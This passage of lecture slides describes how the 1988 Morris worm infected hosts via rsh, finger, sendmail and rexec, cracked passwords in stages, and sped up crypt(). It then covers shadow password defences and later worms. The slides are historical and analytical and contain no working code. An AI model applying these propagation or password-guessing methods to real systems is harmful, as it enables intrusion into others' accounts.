  • 20. Worm architecture - Infection procedure The worm uses two favorite routines when it decides that it wants to infect a host. infect() is used from host scanning routines. This routine first checks that it isn't infecting the local machine, an already infected machine or a machine previously attacked but not successfully infected. It uses "infected" and "immune" states. Then comes a series of attacks: rsh from the account that the worm is running under, finger sendmail.
  • 21. Worm architecture - Infection procedure The other infection routine is named hul() and it is run from the password cracking code after a password has been guessed. potential remote user name is available from a .forward or .rhosts file If a remote user name is unavailable the worm uses the local user name it contacts the rexec server on the target host and tries to authenticate itself If it can, it proceeds to the bootstrap phase If not - it tries reverse rexec to the host
  • 22. Worm architecture - Infection procedure Both infect() and hul() use a routine sendworm() - looks for the ll.c bootstrap source file in its objects list uses the makemagic() routine to get a communication stream endpoint (a socket), a random network port number to rendezvous at, and a magic number for authentication. Sends across the bootstrap source. The bootstrap source is compiled and run on the remote system When a connection is successful, the worm ships all of its files across It pauses four seconds to let a command interpreter start on the remote side, then it issues commands to create a new worm.
  • 23. Worm architecture - Password cracking Guessing passwords. The worm's password guessing is driven by a little 4-state machine. The first state gathers password data, while the remaining states represent increasingly less likely sources of potential passwords. crack_0() collect information about hosts and accounts. crack_1() looks for trivially broken passwords (the account name, the account name concatenated with itself, the first name ) crack_2(). In this state the worm compares a list of favorite passwords crack_3(). It opens the UNIX online dictionary /usr/dict/words and goes through it one word at a time.
  • 24. Worm architecture - Password cracking Faster password encryption. The worm's crypt() algorithm appears to be a compromise between time and space. Advantages of the worm encryption : worm's algorithm to use bit-field and shift operations on the password data precomputing shifts and masks The biggest performance improvement comes as a result of combining permutations: the worm uses expanded arrays which are indexed by groups of bits rather than the single bits used by the standard algorithm
  • 25. Worm architecture - Password cracking Result: The worm's version of the UNIX crypt() routine ran more than 9 times faster than the standard version when it was tested VAX 8600. While the standard crypt() takes 54 seconds to encrypt 271 passwords on our 8600 (the number of passwords actually contained in our password file), the worm's crypt() takes less than 6 seconds.
  • 26. Worm architecture - Defense How can system administrators defend against fast implementations of crypt()? One suggestion that has been introduced is the idea of shadow password files. In this scheme, the encrypted passwords are hidden rather than public, forcing a cracker to either break a privileged account use the host's CPU and (slow) encryption algorithm to attack, with the added danger that password test requests could be logged and password cracking discovered.
  • 27. Current status Purposes Vary: •Denial of Service: CodeRed •Backdoor: CodeRedII left the system up for grabs •Replace/Remail: Nimda replaced common file types •Nothing: Kournikova spread to everyone you know •Anything: arbitrary code means arbitrary code An Ongoing Threat •Windows: • CodeRed (IIS), CodeRedII(IIS), Klez(OL), ILoveYou(OL), Magistr(OL), AnnaKournikova(OL), SirCam... •Linux: • Slapper (Apache), Ramen(wu-ftpd+), Lion(bind)...
  • 28. References The Internet Worm Program: An Analysis Eugene H. Spafford Remembering the Net Crash of ‘88 Bob Sullivan A Tour of the Worm Donn Seeley A report on internet worm Bob Page
  • 29. Discussion •Why the worm reproduces so quickly that it could swamp machine?